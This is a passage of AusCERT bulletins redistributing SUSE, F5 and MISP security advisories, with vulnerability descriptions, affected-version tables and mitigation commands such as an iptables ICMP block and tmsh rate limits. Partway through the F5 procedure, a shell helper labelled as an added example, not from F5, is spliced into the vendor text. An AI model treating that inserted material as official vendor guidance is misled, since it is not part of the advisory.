
o CVE-2018-17955: Use random file name instead of static names (bsc#1117592).

Non-security issue fixed:

o Removed calls to /sbin/insserv (bsc#1026027).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise High Availability 12-SP2:
  zypper in -t patch SUSE-SLE-HA-12-SP2-2021-182=1

Package List:

o SUSE Linux Enterprise High Availability 12-SP2 (noarch):
  yast2-multipath-3.1.9-12.3.45

References:

o https://www.suse.com/security/cve/CVE-2018-17955.html
o https://bugzilla.suse.com/1026027
o https://bugzilla.suse.com/1117592

- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYApb2uNLKJtyKPYoAQhDaQ//bymcSyssZYCror1iAj0Ti4SIZNPboN/B
QFTt2oizynd0f3JClzhZblxwoK11W7YV80P9qrPPmBul5nQa8q4E/ody0GsxaAER
x8N01scQ1qzwIscEvDAquMuPPkek9OC1lRWHafCe9uLzxqDAF8xKHfzIi6MEhytc
+VjeoY/c8As+tgu5A6SWLy8oJxzAPD6A6nvB2q1LayOVTvaRCDEZbeQQiNiWk7Rk
bQ11sxuuWNZAv0jbUSe4okpImoz2+Hh1VU5tCrlEAFwR08x1uLP40eQgS6+gBF9T
oAk4GgilgcN33D6RNPGfBoHRy3bzksDoQsBhIbUZRY6LlYj1Du+jvQ0qhnVtHojx
/7GZBeo74uG+nDHZtfLNTNNQBKIorcjEUXuYwRIVgiHwQrIvKOwDRtuniX22qWWa
Job3aZ5rrLGSaEnQbTCh6z8oTTssE5zD1Rm4M/2BQCg3OU5ATQYVwEMSGbmVDpll
uInXycNxlxojLteNtpXxjN18KLy1vOf5xqgSPHQUfNcRGtDyN06Fyr9eIWzqkM4x
L0/y75mSpkjKNaVGgGVO2ufThFM332iPcOo3CHXBp7pqrrelPQfaMJVsRYxNcVd8
Wu7Y5yZDjhfeWM8SNGFrA/P2ZXsvmmNzIO/w8xhkzK7nkZhkG2X8DRBX2uqC1iTT
7vbrRqlMWdc=
=1f7W
-----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 22 January 2021

ESB-2020.4547.2 - UPDATE [Appliance] BIG-IP and BIG-IQ products: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                              ESB-2020.4547.2
              Linux kernel and TMM vulnerability CVE-2020-25705
                              22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           BIG-IP
                   BIG-IQ
Publisher:         F5 Networks
Operating System:  Network Appliance
Impact/Access:     Denial of Service        -- Existing Account
                   Access Confidential Data -- Remote/Unauthenticated
                   Reduced Security         -- Remote/Unauthenticated
Resolution:        Mitigation
CVE Names:         CVE-2020-25705 CVE-2018-10675
Reference:         ESB-2020.4505
                   ESB-2020.4391
                   ESB-2020.4377
                   ESB-2020.4375

Original Bulletin:
   https://support.f5.com/csp/article/K09604370
   https://support.f5.com/csp/article/K40540405

Comment: This bulletin contains two (2) F5 Networks security advisories.

Revision History:  January 22 2021: K09604370 - Vendor added additional
                                    vulnerable component
                   December 24 2020: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

K09604370: Linux kernel and TMM vulnerability CVE-2020-25705

Original Publication Date: 24 Dec, 2020
Latest Publication Date: 22 Jan, 2021

Security Advisory Description

A flaw in the way reply ICMP packets are limited in the Linux kernel
functionality was found that allows open UDP ports to be scanned quickly.
This flaw allows an off-path remote user to effectively bypass UDP source
port randomization. The highest threat from this vulnerability is to
confidentiality and possibly integrity, because software that relies on UDP
source port randomization is indirectly affected as well. Kernel versions
before 5.10 may be vulnerable to this issue.
(CVE-2020-25705)

Impact

A remote off-path attacker can determine open User Datagram Protocol (UDP)
source ports on a vulnerable system based on Internet Control Message Protocol
(ICMP) error messages, making it possible to execute a "SAD DNS attack."

Security Advisory Status

F5 Product Development has assigned ID 974093 (BIG-IP control plane),
ID 982697 (BIG-IP data plane) and ID 974093-4 (BIG-IQ) to this vulnerability.

To determine if your product and version have been evaluated for this
vulnerability, refer to the Applies to (see versions) box. To determine if
your release is known to be vulnerable, the components or features that are
affected by the vulnerability, and for information about releases, point
releases, or hotfixes that address the vulnerability, refer to the following
table. For more information about security advisory versioning, refer to
K51812227: Understanding security advisory versioning.

Product: BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS,
FPS, GTM, Link Controller, PEM, SSLO)
Vulnerable component or feature: Linux kernel (control plane): ICMP
implementation
Severity: High    CVSSv3 score^1: 7.4

  Branch | Versions known to be vulnerable | Fixes introduced in
  16.x   | None                            | Not applicable
  15.x   | None                            | Not applicable
  14.x   | None                            | Not applicable
  13.x   | 13.1.0 - 13.1.3                 | None
  12.x   | 12.1.0 - 12.1.5                 | None
  11.x   | 11.6.1 - 11.6.5                 | None

Product: BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS,
FPS, GTM, Link Controller, PEM, SSLO)
Vulnerable component or feature: TMM^2 (data plane): ICMP implementation
Severity: High    CVSSv3 score^1: 7.4

  Branch | Versions known to be vulnerable | Fixes introduced in
  16.x   | 16.0.0 - 16.0.1                 | None
  15.x   | 15.1.0 - 15.1.2                 | None
  14.x   | 14.1.0 - 14.1.3                 | None
  13.x   | 13.1.0 - 13.1.3                 | None
  12.x   | 12.1.0 - 12.1.5                 | None
  11.x   | 11.6.1 - 11.6.5                 | None

Product: BIG-IQ Centralized Management
Vulnerable component or feature: Linux kernel and TMM (ICMP implementation)
Severity: High    CVSSv3 score^1: 7.4

  Branch | Versions known to be vulnerable | Fixes introduced in
  7.x    | 7.0.0 - 7.1.0                   | None
  6.x    | 6.0.0 - 6.1.0                   | None
  5.x    | 5.4.0                           | None

Product: Traffix SDC
Vulnerable component or feature: None
Severity: Not vulnerable    CVSSv3 score^1: None

  Branch | Versions known to be vulnerable | Fixes introduced in
  5.x    | None                            | Not applicable

^1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is
possible that the document may be removed without our knowledge.
^2 The Traffic Management Microkernel (TMM)

Security Advisory Recommended Actions

If you are running a version listed in the Versions known to be vulnerable
column, you can eliminate this vulnerability by upgrading to a version listed
in the Fixes introduced in column. If the table lists only an older version
than what you are currently running, or does not list a non-vulnerable
version, then no upgrade candidate currently exists.
Mitigation

o BIG-IP control plane: Block outgoing ICMP port unreachable messages on the
  management interface
o BIG-IP data plane: Lower the ICMP rate limit on TMM interfaces
    Configure the maximum reject rate
    Configure the ICMP error rate

BIG-IP control plane: Block outgoing ICMP port unreachable messages on the
management interface

To mitigate this vulnerability on the management interface, you can block
outgoing ICMP port unreachable messages. To do so, perform the following
procedure:

Impact of action: The impact of blocking ICMP packets depends on your specific
environment. F5 recommends testing any such changes during a maintenance
window with consideration to the possible impact on your specific environment.

1. Log in to the BIG-IP command line.
2. Block outgoing ICMP port unreachable messages by entering the following
   command:

   iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP

3. Create a backup of the /config/startup file by entering the following
   command:

   cp /config/startup /config/startup.backup

4. Using a text editor, edit the /config/startup file.
5. To ensure iptables changes persist across a reboot, add the following lines
   at the end of the file:

   # For CVE-2020-25705 described in K09604370
   #
   iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
   #

6. Save the /config/startup file and exit the editor.

BIG-IP data plane: Lower the ICMP rate limit on TMM interfaces

To mitigate this vulnerability on the Traffic Management Microkernel (TMM)
interfaces, you can lower the ICMP rate limit. Adjust to a lower value to
lessen the possibility of the vulnerability being exploited, but ensure it is
still acceptable based on your environment and conditions.
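The control-plane procedure above leaves two things to the operator: the rule is added with iptables -A, so re-running step 2 or sourcing the startup file a second time stacks an identical rule, and step 5 is a hand edit of /config/startup. The POSIX shell helper below is an added example, not code from the F5 article or from AusCERT. It persists the advisory's exact rule line into a startup file only if that line is not already there, taking a backup first as step 3 does, and reports how many copies the file holds. The function names (persist_icmp_block, count_rule, rule_is_active) and the file-path parameter are this example's own; /config/startup is the path the advisory names, and the helper can be exercised against any scratch file.

```shell
#!/bin/sh
# Added example, not part of the F5 K09604370 article: persist the advisory's
# control-plane iptables rule in a startup file without stacking duplicates
# when the procedure is re-run. The rule text is the advisory's, verbatim;
# the file path is a parameter (the advisory's own path is /config/startup).

RULE='iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP'
MARKER='# For CVE-2020-25705 described in K09604370'

# persist_icmp_block FILE
#   Steps 3 to 5 of the advisory as one idempotent operation: back FILE up,
#   then append the marker comment and the rule unless that exact rule line
#   is already present. Returns 0 when the rule is in FILE afterwards,
#   1 on an I/O failure.
persist_icmp_block() {
    file=$1
    [ -f "$file" ] || : > "$file" || return 1
    if grep -qxF -- "$RULE" "$file"; then
        return 0                      # already persisted; nothing to do
    fi
    cp "$file" "$file.backup" || return 1
    printf '%s\n#\n%s\n#\n' "$MARKER" "$RULE" >> "$file" || return 1
}

# count_rule FILE
#   Prints how many lines of FILE are exactly the rule. A healthy startup
#   file prints 0 (mitigation not applied) or 1 (applied once).
count_rule() {
    grep -cxF -- "$RULE" "$1" || true
}

# rule_is_active
#   Asks the running kernel whether the rule is currently in the OUTPUT
#   chain (iptables -C needs root and a real BIG-IP; not used by the
#   file-level checks).
rule_is_active() {
    iptables -C OUTPUT -p icmp --icmp-type destination-unreachable -j DROP 2>/dev/null
}
```

On the appliance itself, `persist_icmp_block /config/startup` (as root) followed by `count_rule /config/startup` replaces steps 3 to 5 and confirms a single copy. One caveat worth knowing before testing the change in a maintenance window, as the advisory's "Impact of action" note asks: `--icmp-type destination-unreachable` matches every code of ICMP type 3, including fragmentation-needed (code 4), which path MTU discovery depends on. iptables also accepts the narrower `--icmp-type port-unreachable` (type 3, code 3) if you want to scope the block to the message this issue concerns, at the cost of departing from the vendor's published rule.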
To do so, perform the following procedure:

Configure the maximum reject rate

The tm.maxrejectrate database key allows you to adjust the number of TCP RST
packets or ICMP unreachable packets that the BIG-IP system sends in response
to incoming client-side or server-side packets that cannot be matched with
existing connections to BIG-IP virtual servers, self IP addresses, or secure
network address translations (SNATs). The default value for the
tm.maxrejectrate key is 250 TCP RSTs or 250 ICMP unreachable packets per
second. The minimum value allowed is 1 and the maximum value is 1000. To
adjust the rate at which the BIG-IP system issues TCP RSTs or ICMP unreachable
packets, perform the following procedure:

Impact of action: The impact of lowering the rate limit of ICMP packets depends
on your specific environment. F5 recommends testing any such changes during a
maintenance window with consideration to the possible impact on your specific
environment.

1. Log in to the TMOS Shell (tmsh) by entering the following command:

   tmsh

2. Adjust the tm.maxrejectrate database key by using the following command
   syntax:

   modify sys db tm.maxrejectrate value <value>

   For example, to change tm.maxrejectrate to 50, enter the following command:

   modify sys db tm.maxrejectrate value 50

Configure the ICMP error rate

The tm.maxicmprate BigDB key allows you to limit the number of responses the
BIG-IP LTM system sends for ICMP errors. The default value for the
tm.maxicmprate BigDB key is 100. To adjust the number of ICMP error responses
from a BIG-IP system, perform the following procedure:

Impact of action: The impact of lowering the rate limit of ICMP packets depends
on your specific environment. F5 recommends testing any such changes during a
maintenance window with consideration to the possible impact on your specific
environment.

1. Log in to tmsh by entering the following command:

   tmsh

2. Adjust the tm.maxicmprate database key by using the following command
   syntax:

   modify /sys db tm.maxicmprate value <value>

   For example, to change tm.maxicmprate to 50, enter the following command:

   modify sys db tm.maxicmprate value 50

3. If the tm.maxforwardicmprate database key is not set to the default value
   of 0, lower the value by using the previous command syntax, replacing
   tm.maxicmprate with tm.maxforwardicmprate.

Supplemental Information

o K13151: Configuring the rate at which the BIG-IP system issues TCP RSTs or
  ICMP unreachable packets
o K14813: Detecting and mitigating DoS/DDoS attacks (11.4.x - 16.x)
o K41942608: Overview of security advisory articles
o K4602: Overview of the F5 security vulnerability response policy
o K4918: Overview of the F5 critical issue hotfix policy
o K9502: BIG-IP hotfix and point release matrix
o K13123: Managing BIG-IP product hotfixes (11.x - 16.x)
o K15106: Managing BIG-IQ product hotfixes
o K15113: BIG-IQ hotfix and point release matrix
o K167: Downloading software and firmware from F5
o K9970: Subscribing to email notifications regarding F5 products
o K9957: Creating a custom RSS feed to view new and updated documents

- --------------------------------------------------------------------------------

K40540405: Linux kernel vulnerability CVE-2018-10675

Original Publication Date: 24 Dec, 2020

Security Advisory Description

The do_get_mempolicy function in mm/mempolicy.c in the Linux kernel before
4.12.9 allows local users to cause a denial of service (use-after-free) or
possibly have unspecified other impact via crafted system calls.
(CVE-2018-10675)

Impact

A local attacker can cause a denial-of-service (DoS) or other negative impacts
on a vulnerable system.

Security Advisory Status

F5 Product Development has assigned ID 976181 (BIG-IP), ID 976409 (BIG-IQ),
and CPF-25230 (Traffix SDC) to this vulnerability.

To determine if your product and version have been evaluated for this
vulnerability, refer to the Applies to (see versions) box.
To determine if your release is known to be vulnerable, the components or
features that are affected by the vulnerability, and for information about
releases, point releases, or hotfixes that address the vulnerability, refer to
the following table. For more information about security advisory versioning,
refer to K51812227: Understanding security advisory versioning.

Product: BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS,
FPS, GTM, Link Controller, PEM, SSLO)
Vulnerable component or feature: Linux kernel
Severity: Medium    CVSSv3 score^1: 5.5

  Branch | Versions known to be vulnerable | Fixes introduced in
  16.x   | None                            | Not applicable
  15.x   | None                            | Not applicable
  14.x   | None                            | Not applicable
  13.x   | None                            | Not applicable
  12.x   | 12.1.0 - 12.1.5                 | None
  11.x   | 11.6.1 - 11.6.5                 | None

Product: BIG-IQ Centralized Management
Vulnerable component or feature: Linux kernel
Severity: Medium    CVSSv3 score^1: 5.5

  Branch | Versions known to be vulnerable | Fixes introduced in
  7.x    | 7.0.0 - 7.1.0                   | None
  6.x    | 6.0.0 - 6.1.0                   | None
  5.x    | 5.4.0                           | None

Product: Traffix SDC
Vulnerable component or feature: Linux kernel
Severity: Medium    CVSSv3 score^1: 5.5

  Branch | Versions known to be vulnerable | Fixes introduced in
  5.x    | 5.1.0                           | 5.1.0 CF 22

^1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is
possible that the document may be removed without our knowledge.

Security Advisory Recommended Actions

If you are running a version listed in the Versions known to be vulnerable
column, you can eliminate this vulnerability by upgrading to a version listed
in the Fixes introduced in column. If the table lists only an older version
than what you are currently running, or does not list a non-vulnerable
version, then no upgrade candidate currently exists.

Mitigation

To mitigate this vulnerability, you should permit management access to F5
products only over a secure network and restrict command line access for
affected systems to only trusted users. For more information about this
mitigation that is applicable to the BIG-IP system, refer to K13309:
Restricting access to the Configuration utility by source IP address
(11.x - 16.x) and K13092: Overview of securing access to the BIG-IP system.

Supplemental Information

o K41942608: Overview of security advisory articles
o K4602: Overview of the F5 security vulnerability response policy
o K4918: Overview of the F5 critical issue hotfix policy
o K9502: BIG-IP hotfix and point release matrix
o K13123: Managing BIG-IP product hotfixes (11.x - 16.x)
o K15106: Managing BIG-IQ product hotfixes
o K15113: BIG-IQ hotfix and point release matrix
o K167: Downloading software and firmware from F5
o K9970: Subscribing to email notifications regarding F5 products
o K9957: Creating a custom RSS feed to view new and updated documents

- --------------------------END INCLUDED TEXT--------------------
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYApiv+NLKJtyKPYoAQhO+A//e0dHUCY7SUlPtqTYdk6FATrJEik2bIjl
pH5pfKyQd+R7vF/y/e4wwYToNtse+49bOsO6x1t+Zmx3e5DhveVDyuNVN8r/GJeO
lSXa1AJGJPQAAefVArP5nllp3LkBJFp/vDaqL9unQQHxygukJJcF/LftuGo39APP
Eq7UJNbKsexNw4g8QOtCyQw+uSZA6bazRAUfDdhB85z6CPd5uhZcRynDWFUNe2j8
4ouavOkdWYHz76aft6SEnFZ4oqEfzUZBTpYPHCoWGsviwJ12MGRghv82mj9oUxCa
mPzvVIo0YAjqHP91R16w+zZKO9xzHT1KKPbnvc9CHKO/jq0+R26xE+Nc6rB+LFNg
F6OV+AzRyTylp3oPctyVzXjnF77xG0s5pDiWw4UEnAXwkKUYJ6IMnL/4pkqv3V6L
WCL4JY16XKvhTWCdSvnAPIeO5u5Z8iSQz4MBy0mG9BPnm5xMcBIb5U7M8psKJswm
uAahtn51L+Y6BTHy9PF53UYLKd9Y1N300wCG0XMP4LqJN1Uew973xeRNrjlTIVbM
1oOUwjiIWibM86q5D22xuT8uWHl6Q2rf3l5B/zl4U/VL4JXrZiyzs9ZXWIK8RZLi
+XXN5B/USEtltc0M5h3ENWS8biXzTQushTnCpSnVR4ogYvaXGVJdAVvrJwTyTlee
croxzzOtpPQ=
=fV24
-----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 22 January 2021

ESB-2020.1764.2 - UPDATE [Appliance] F5 Networks: Increased privileges - Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                              ESB-2020.1764.2
               Rowhammer hardware vulnerability CVE-2020-10255
                              22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           BIG-IP iSeries
                   VIPRION B4450 blades
Publisher:         F5 Networks
Operating System:  Network Appliance
Impact/Access:     Increased Privileges -- Existing Account
                   Denial of Service    -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-10255

Original Bulletin:
   https://support.f5.com/csp/article/K60570139

Revision History:  January 22 2021: Vendor updated vulnerable product information
                   May 19 2020: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

K60570139: Rowhammer hardware vulnerability CVE-2020-10255

Original Publication Date: 19 May, 2020
Latest Publication Date: 22 Jan, 2021

Security Advisory Description

Modern DRAM chips (DDR4 and LPDDR4 after 2015) are affected by a vulnerability
in deployment of internal mitigations against RowHammer attacks known as
Target Row Refresh (TRR), aka the TRRespass issue. To exploit this
vulnerability, the attacker needs to create certain access patterns to trigger
bit flips on affected memory modules, aka a Many-sided RowHammer attack. This
means that, even when chips advertised as RowHammer-free are used, attackers
may still be able to conduct privilege-escalation attacks against the kernel,
conduct privilege-escalation attacks against the Sudo binary, and achieve
cross-tenant virtual-machine access by corrupting RSA keys. The issue affects
chips produced by SK Hynix, Micron, and Samsung. NOTE: tracking DRAM
supply-chain issues is not straightforward because a single product model
from a single vendor may use DRAM chips from different manufacturers.
(CVE-2020-10255)

Impact

This vulnerability impacts BIG-IP iSeries platforms and VIPRION B4450 blades
only. An unprivileged system user may leverage this flaw and use rowhammer
attack variants to induce bit corruptions across memory space, potentially
resulting in denial of service or privilege escalation scenarios. The highest
threat from this vulnerability is to system availability.

Security Advisory Status

F5 Product Development has assigned ID 909345 (BIG-IP) to this vulnerability.

To determine if your product and version have been evaluated for this
vulnerability, refer to the Applies to (see versions) box. To determine if
your release is known to be vulnerable, the components or features that are
affected by the vulnerability, and for information about releases, point
releases, or hotfixes that address the vulnerability, refer to the following
table. For more information about security advisory versioning, refer to
K51812227: Understanding Security Advisory versioning.

Product: BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link
Controller, PEM)
Vulnerable component or feature: Hardware: DRAM chips
Severity: Medium    CVSSv3 score^1: 6.5

  Branch | Versions known to be vulnerable | Fixes introduced in
  15.x   | 15.0.0 - 15.1.0                 | None
  14.x   | 14.1.0 - 14.1.2                 | None
  13.x   | 13.1.0 - 13.1.3                 | None
  12.x   | 12.1.0 - 12.1.5                 | None
  11.x   | 11.6.1 - 11.6.5                 | None

Product: BIG-IQ Centralized Management
Vulnerable component or feature: None
Severity: Not vulnerable    CVSSv3 score^1: None

  Branch | Versions known to be vulnerable | Fixes introduced in
  7.x    | None                            | Not applicable
  6.x    | None                            | Not applicable
  5.x    | None                            | Not applicable

Product: Traffix SDC
Vulnerable component or feature: None
Severity: Not vulnerable    CVSSv3 score^1: None

  Branch | Versions known to be vulnerable | Fixes introduced in
  5.x    | None                            | Not applicable

^1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is
possible that the document may be removed without our knowledge.

F5 will not develop a fix for vulnerable products that do not already have a
fixed version listed in this article, and will not update this table with
subsequent vulnerable releases in the associated branches. F5 recommends that
you update to more recent, non-vulnerable versions whenever feasible. For more
information, refer to K4602: Overview of the F5 security vulnerability
response policy.

Security Advisory Recommended Actions

If you are running a version listed in the Versions known to be vulnerable
column, you can eliminate this vulnerability by upgrading to a version listed
in the Fixes introduced in column. If the table lists only an older version
than what you are currently running, or does not list a non-vulnerable
version, then no upgrade candidate currently exists.
Mitigation

None

Supplemental Information

o K51812227: Understanding Security Advisory versioning
o K41942608: Overview of Security Advisory articles
o K4602: Overview of the F5 security vulnerability response policy
o K4918: Overview of the F5 critical issue hotfix policy
o K9502: BIG-IP hotfix and point release matrix
o K13123: Managing BIG-IP product hotfixes (11.x - 15.x)
o K167: Downloading software and firmware from F5
o K9970: Subscribing to email notifications regarding F5 products
o K9957: Creating a custom RSS feed to view new and updated documents

- --------------------------END INCLUDED TEXT--------------------
Contact information for the authors of the original document is included in the
Security Bulletin above. If you have any questions or need further information,
please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
AusCERT - Security Bulletins · 22 January 2021

ESB-2020.0597.3 - UPDATE [Appliance] F5 BIG-IP and Traffix Products: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.0597.3
                 Intel processors vulnerability CVE-2019-14607
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           F5 BIG-IP Products
                   F5 Traffix Products
Publisher:         F5 Networks
Operating System:  Network Appliance
Impact/Access:     Increased Privileges   -- Existing Account
                   Access Privileged Data -- Existing Account
                   Denial of Service      -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2019-14607
Reference:         ESB-2019.4707
                   ESB-2019.4651.2

Original Bulletin:
   https://support.f5.com/csp/article/K29100014

Revision History:  January  22 2021: Vendor updated vulnerable product information
                   February 28 2020: Additional impacts added
                   February 20 2020: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

K29100014: Intel processors vulnerability CVE-2019-14607

Original Publication Date: 19 Feb, 2020
Latest   Publication Date: 22 Jan, 2021

Security Advisory Description

Improper conditions check in multiple Intel Processors may allow an
authenticated user to potentially enable partial escalation of privilege,
denial of service and/or information disclosure via local access.
(CVE-2019-14607)

Impact

While certain F5 hardware platforms contain the affected processor, such as the
C109, C113, D110, C115, C117, and C120 platforms, only deployments running a
Virtual Clustered Multiprocessing (vCMP) configuration are vulnerable.
Deployments without vCMP are not vulnerable, as the issue is limited to
virtualized environments that share a physical CPU. All versions of BIG-IP
Virtual Edition (VE) are potentially impacted if the processor underlying the
BIG-IP VE installation is affected.
Microcode updates from Intel are available to address this issue, but must be
applied at the hardware level, which is outside the scope of the ability of F5
to support or patch.

This hardware issue impacts all platforms using the following Intel processor
families:

  o Datacenter Microprocessors
  o Client and Xeon E3 Microprocessors
  o Intel Xeon Processor E3 v5 & v6 Family
  o Intel Xeon E Processor
  o Intel Xeon D, W Processor
  o Intel Core i9 8th & 9th Generation

BIG-IP

The following BIG-IP platforms contain the affected Intel processors:

  o C113 BIG-IP 4000s - 4200v
      All 4000s - 4200v do not support vCMP
  o C109 BIG-IP 5000s - 5250v
      5000s do not support vCMP
      5200v and 5250v support vCMP
  o D110 BIG-IP 7000s - 7250v
      7000s do not support vCMP
      7200v, 7250v, and 7255v support vCMP
  o C115 (BIG-IP i4600)
  o C117 (BIG-IP i2600)
  o C120 (HERCULON i2800)

Traffix

Only HPE Gen10 servers are vulnerable.

Security Advisory Status

F5 Product Development has assigned ID 878317 (BIG-IP) and CPF-25174 (Traffix)
to this vulnerability.

To determine if your product and version have been evaluated for this
vulnerability, refer to the Applies to (see versions) box. To determine if your
release is known to be vulnerable, the components or features that are affected
by the vulnerability, and for information about releases, point releases, or
hotfixes that address the vulnerability, refer to the following table. For more
information about security advisory versioning, refer to K51812227:
Understanding Security Advisory versioning.
+-------------------+------+----------+----------+----------+------+----------+
|                   |      |Versions  |Fixes     |          |CVSSv3|Vulnerable|
|Product            |Branch|known to  |introduced|Severity  |score^|component |
|                   |      |be        |in        |          |1     |or feature|
|                   |      |vulnerable|          |          |      |          |
+-------------------+------+----------+----------+----------+------+----------+
|                   |15.x  |15.0.0 -  |None      |          |      |          |
|                   |      |15.1.0    |          |          |      |          |
|                   +------+----------+----------+          |      |          |
|                   |14.x  |14.1.0 -  |None      |          |      |          |
|BIG-IP (LTM, AAM,  |      |14.1.2    |          |          |      |          |
|AFM, Analytics,    +------+----------+----------+          |      |          |
|APM, ASM, DNS, FPS,|13.x  |13.1.0 -  |None      |Medium    |5.3   |CPU       |
|GTM, Link          |      |13.1.3    |          |          |      |          |
|Controller, PEM)   +------+----------+----------+          |      |          |
|                   |12.x  |12.1.0 -  |None      |          |      |          |
|                   |      |12.1.5    |          |          |      |          |
|                   +------+----------+----------+          |      |          |
|                   |11.x  |11.5.2 -  |None      |          |      |          |
|                   |      |11.6.5    |          |          |      |          |
+-------------------+------+----------+----------+----------+------+----------+
|                   |7.x   |None      |Not       |          |      |          |
|                   |      |          |applicable|          |      |          |
|                   +------+----------+----------+          |      |          |
|BIG-IQ Centralized |6.x   |None      |Not       |Not       |None  |None      |
|Management         |      |          |applicable|vulnerable|      |          |
|                   +------+----------+----------+          |      |          |
|                   |5.x   |None      |Not       |          |      |          |
|                   |      |          |applicable|          |      |          |
+-------------------+------+----------+----------+----------+------+----------+
|Traffix SDC        |5.x   |5.0.0 -   |None      |Medium    |5.3   |CPU       |
|                   |      |5.1.0     |          |          |      |          |
+-------------------+------+----------+----------+----------+------+----------+

^1The CVSSv3 score link takes you to a resource outside of AskF5, and it is
possible that the document may be removed without our knowledge.

F5 will not develop a fix for vulnerable products that do not already have a
fixed version listed in this article, and will not update this table with
subsequent vulnerable releases in the associated branches. F5 recommends that
you update to more recent, non-vulnerable versions whenever feasible. For more
information, refer to K4602: Overview of the F5 security vulnerability response
policy.
Security Advisory Recommended Actions

If you are running a version listed in the Versions known to be vulnerable
column, you can eliminate this vulnerability by upgrading to a version listed
in the Fixes introduced in column. If the table lists only an older version
than what you are currently running, or does not list a non-vulnerable version,
then no upgrade candidate currently exists.

Mitigation

BIG-IP

This impacts vCMP systems with single-core guests and BIG-IP VE systems running
on unpatched CPUs. For BIG-IP VE systems, responsibility for preventing these
attacks falls on the hypervisor/host platform, which is outside the scope of
the ability of F5 to support or patch. To mitigate this issue, contact your
cloud provider or hypervisor vendor to ensure their platforms or products are
not subject to this vulnerability.

For vCMP systems, to mitigate this vulnerability, you should configure vCMP
guests to use at least two cores so that physical CPUs are not shared among
guests.

Traffix

Intel is releasing firmware updates to mitigate this potential vulnerability.
To mitigate this vulnerability, you can update to the latest firmware provided
by Intel. For more information, refer to Intel Security Advisory
INTEL-SA-00317.

Note: This link takes you to a resource outside of AskF5, and it is possible
that the document may be removed without our knowledge.
Supplemental Information

  o K51812227: Understanding Security Advisory versioning
  o K41942608: Overview of Security Advisory articles
  o K4602: Overview of the F5 security vulnerability response policy
  o K4918: Overview of the F5 critical issue hotfix policy
  o K9502: BIG-IP hotfix and point release matrix
  o K13123: Managing BIG-IP product hotfixes (11.x - 15.x)
  o K167: Downloading software and firmware from F5
  o K9970: Subscribing to email notifications regarding F5 products
  o K9957: Creating a custom RSS feed to view new and updated documents

- --------------------------END INCLUDED TEXT--------------------
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0264 - [Win][UNIX/Linux] MISP: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0264
  MISP 2.4.137 released (New exclusion module for the correlation engine,
         many improvements and security vulnerabilities resolved)
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           MISP
Publisher:         MISP
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Cross-site Scripting -- Remote with User Interaction
                   Reduced Security     -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2021-25325 CVE-2021-25324 CVE-2021-25323 CVE-2021-3184

Original Bulletin:
   https://www.misp-project.org/2021/01/20/MISP.2.4.137.released.html

- --------------------------BEGIN INCLUDED TEXT--------------------

MISP 2.4.137 released

We have released 2.4.137, a security and bug fix release including a collection
of fixes and improvements collected over the past month.

Building tools for the security community sure has its perks - over the past
week we have received two independent security test results of two separate
organisations, revealing several vulnerabilities. The update to this version is
therefore highly recommended.

A little note on vulnerability - we always welcome organisations helping us
secure MISP and our tooling in general and would hereby like to thank everyone
taking part in the process!

Several vulnerabilities resolved

  o [CVE-2021-25324] Stored XSS via the galaxy cluster view - Discovered by
    Daniel Kubica of ESET, spol. s r.o.
  o [CVE-2021-25325] Stored XSS via the galaxy element index - Discovered by
    Daniel Kubica of ESET, spol. s r.o.
  o [CVE-2021-25323] Weak default password change request policy not requiring
    the entry of the current password - Discovered by Daniel Kubica of ESET,
    spol. s r.o.
  o [CVE-2021-3184] Reflected XSS via the set homepage button - Reported by an
    anonymous party

A long list of quality of life improvements

  o The synchronisation now compresses the data exchanged, improving the
    transfer rates during the exchange
